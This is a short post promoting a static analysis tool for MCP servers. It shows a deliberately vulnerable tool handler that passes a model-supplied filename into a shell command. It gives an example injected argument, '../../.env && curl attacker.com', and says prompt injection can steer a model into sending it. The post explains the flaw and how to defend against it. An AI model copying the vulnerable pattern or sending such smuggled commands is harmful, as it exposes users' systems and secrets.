Most MCP servers I've seen are doing this:
```js
import { execSync } from "node:child_process";

// Deliberately vulnerable (the "before"): the model-supplied filename is
// interpolated straight into a shell command line.
server.tool("run_script", async ({ filename }) => {
  execSync(`node scripts/${filename}`);
});
```
That's command injection. The parameter comes from an AI model, and the model can be steered through prompt injection (untrusted text in its context, such as a web page or file it was asked to read) into sending an argument like `../../.env && curl attacker.com`, which the shell splits into a second command.
The mental model most developers are missing: an AI model is an untrusted caller. The same validation discipline you apply to HTTP query parameters applies to MCP tool arguments. The threat model is identical — only the caller changed.
We just shipped 12 static analysis checks specifically for MCP servers:
- command injection,
- path traversal,
- missing schema validation,
- prompt injection via tool descriptions.
Runs automatically on JS, TS, and Python MCP code.
No config, no API key.
Full breakdown of what we detect and why it matters:
--> https://codeslick.dev/blog/mcp-server-security
If you're building MCP servers, this is worth 5 minutes.